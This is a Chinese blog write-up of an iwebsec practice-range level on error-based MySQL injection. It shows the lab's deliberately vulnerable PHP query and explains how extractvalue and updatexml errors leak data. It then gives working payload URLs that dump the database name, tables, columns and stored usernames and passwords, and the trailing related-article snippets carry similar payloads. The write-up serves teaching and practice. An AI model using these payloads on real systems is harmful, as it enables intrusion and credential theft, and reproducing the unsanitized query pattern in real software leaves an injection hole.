iwebsec sql-报错注入

最新推荐文章于 2024-11-05 14:55:45 发布
最新推荐文章于 2024-11-05 14:55:45 发布
阅读量567 收藏
点赞数 20
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134221191
版权

05-报错注入

原理分析:

SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用。

前提条件:

使用mysql_error()函数,可以返回上一个Mysql操作产生的文本错误信息。

报错注入分类:

  1. BIGINT等数据类型溢出
  2. xpath语法错误
  3. floor()报错
  4. 列名重复报错
  5. 参数不规范报错

打开如下:

在这里插入图片描述

分析代码:

<?php
  if(isset($_GET['id'])){
	$id=$_GET['id'];

	$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
	else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error());
//	echo "</font>";
	}

?>

如果执行失败会使用 mysql_error() 函数输出报错信息,可以用 extractvalue 函数或 updatexml 函数来进行注入

函数解析:

  1. EXTRACTVALUE函数:
    • EXTRACTVALUE函数用于从XML文档中提取特定节点的值。
    • 它的语法是:EXTRACTVALUE(xml_document, xpath_expression)
    • xml_document参数是一个XML文档或XML类型的字段,可以是一个XML字符串或存储XML数据的列。
    • xpath_expression参数是一个XPath表达式,用于指定要提取的节点。
    • 该函数返回匹配XPath表达式的节点的值。

使用XPath表示法从XML字符串中提取值

参数:xml_frag: 目标xml文档,xpath_expr: 利用Xpath路径法表示的查找路径

报错原理:Xpath格式语法书写错误的话,就会报错1

如:

在这里插入图片描述

如果第二个参数书写错误:

在这里插入图片描述

updatexml

此函数用来更新选定XML片段的内容,将XML标记的给定片段的单个部分替换为 xml_target新的XML片段 new_xml ,然后返回更改的 XML。xml_target替换的部分与xpath_expr用户提供的XPath表达式匹配。

参数:xml_target:: 需要操作的xml片段,xpath_expr:需要更新的xml路径,(Xpath格式) new_xml: 更新后的内容

报错原理:当Xpath路径语法错误时,就会报错,报错内容含有错误的路径内容

如:

在这里插入图片描述

如果第二个参数出错:

在这里插入图片描述

知其原理后,进行构造注入语句:

http://localhost:8050/sqli/05.php?id=1 and extractvalue(1, concat(0x7e,(select database())))
http://localhost:8050/sqli/05.php?id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

在这里插入图片描述

得到数据库后再进一步注入:

http://localhost:8050/sqli/05.php?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #全部表名

http://localhost:8050/sqli/05.php?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='sqli'),0x7e),1) #sqli表中的字段

http://localhost:8050/sqli/05.php?id=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from iwebsec.sqli),0x7e),1) #username,password字段内容

在这里插入图片描述

正在努力…
关注
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)
mooyuan的博客
11-27 1228
iwebsec靶场的SQL注入漏洞的第05关updatexml注入漏洞渗透。​通过源码再来分析下时间盲注关卡重点内容:(1)闭合方式是什么?iwebsec的第05关关卡为数字型注入,无闭合方式(2)注入类别是什么?这部分是报错型盲注(3)是否过滤了关键字?很明显通过源码,iwebsec的时间报错型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习,真正了解原理后可以在使用sqlmap来提升速度。
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1846
sql注入漏洞
iwebsec sql-二次注入
Enrich_Life的博客
12-04 551
在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。注册用户功能点可以插入一条脏数据,邮箱找回功能点会查询之前注册用户时候的脏数据,就会造成 SQL 注入,看到有。函数,可以进行报错注入。先在用户注册页面构造。
iwebsec sql-宽字节注入
Enrich_Life的博客
11-05 49
函数会对引号进行转义但是这里用了 gbk 编码,这里和02-字符注入不同的是可以结合报错注入。原理解析可以回去看02-字符注入。原理解析回去看02-字符注入。跟02-字符注入一样,
iwebsec靶场SQL注入-updatexml注入
qq_56041380的博客
03-27 502
updatexml注入也是一种报错注入,它利用updatexml函数中的第二个参数Xpath_string的报错进行注入。Xpath_string是XML文档路径,格式是/XXX/XXX/XXX/,如果格式不正确就会报错。
CTF学习笔记7:iwebsec-SQL注入漏洞-05-updatexml注入
lvx++的博客
01-23 1134
目录一、解题过程(一)直接上payload二、源码分析(一)php源码分析(二)报错注入探究1.rand和floor函数与group by的冲突2.extractvalue()函数 一、解题过程 (一)直接上payload ?id=1^updatexml(1,concat(0x7e,(select group_concat(password) from iwebsec.users),0x7e),3)--+ 说明:如果输出长度受限,需要用reverse反转再拼接 ?id=1^updatexml(1,conc
iwebsec靶场通关sql注入详解
m0_51090949的博客
07-12 1379
iwebsec靶场,sql注入通关,详细教程。
iwebsec靶场(sql注入)
果粒程
02-24 1193
iwebsec靶场(sql注入)
web-报错注入-皮卡丘靶场
07-15
Web应用中,报错注入通常是由于不安全的SQL查询处理导致的。 在皮卡丘靶场中,我们可以看到几种不同类型的报错注入示例: 1. **Insert(POST请求的报错注入)**: 攻击者利用`POST`请求发送Payload `' and ...
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]
qwsn
01-18 3206
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 报错注入 1、sql server的报错页面 2、SQLSERVER+ASP 报错注入示例
sql注入-报错注入
课嗨教育的专栏
04-29 816
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
SQL注入---报错注入
qq_41592307的博客
09-03 352
报错注入 1、报错注入的原理 由于后台没有对报错信息进行过滤,报错信息会显示在前端,可以使用指定的函数来制造报错,由 此来获取数据信息。 2、报错函数 extractvalue(xml_frag,xpath_expr):对XML文档数据进行查询的XPATH函数 如果Xpath的输入错误,则会将错误信息结果显示在前端。 注:extractvalue()和updatexml()函数查询的最大长度为32位,如果超过32位则需要使用 substring()函数截取 ...
[NISACTF 2022]join-us - 报错注入&无列名注入
oZuoShen123的博客
10-06 600
这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了 1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()# 或 1' || (select * from aa)#   FUNCTION sqlsql.a does not exist 2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#   没拦截,说明可以试一下
SQL 常用更新操作
Fisher3652的博客
11-05 134
SQL 常用更新操作
Flink SQL
最新发布
qq_41081716的博客
11-05 189
以上步骤展示了如何使用 Flink SQL 从 Kafka 读取数据、进行聚合计算,并将结果分别写入 MySQL 和 HDFS。这是一个基本的流程,根据实际需求,可以调整表结构、连接器配置以及 SQL 查询以适应不同的应用场景。
PostgreSQL 时间函数操作
云端的博客
10-31 157
PostgreSQL 时间函数操作
SQL50】day 1
m0_73629042的博客
11-05 233
使用不等于符号无法筛选null情况。
SQL实战进阶】——视图的定义、使用
jd1813346972的博客
11-02 1021
该篇文章主要利用15个案例帮助读者快速掌握SQL的视图相关用法,涉及视图的创建、删除、更新、更改等等。
使用PostgreSQL进行高效数据管理
qq_36287830的博客
11-01 1141
PostgreSQL是一个开源的关系型数据库管理系统,以其可靠性和强大的功能而著称。它支持SQL标准,并提供了许多高级功能,如事务完整性、多版本并发控制(MVCC)、复杂查询、外键、触发器、视图、事务等。通过本文,你已经学习了如何使用PostgreSQL进行高效的数据管理。我们介绍了PostgreSQL的基本概念、安装方法、配置PostgreSQL、基本操作、性能优化、备份和恢复、高级特性(分区表、全文搜索、地理空间数据)、监控和日志、故障排除等内容。
eazy-sql报错注入
06-03
通常情况下,避免 SQL 注入的方法是使用参数化查询。具体来说,使用参数化查询可以将用户输入的数据与 SQL 查询语句分开,从而避免恶意用户在输入时注入恶意 SQL 代码。 如果你使用的是 eazy-sql,可以在查询时使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值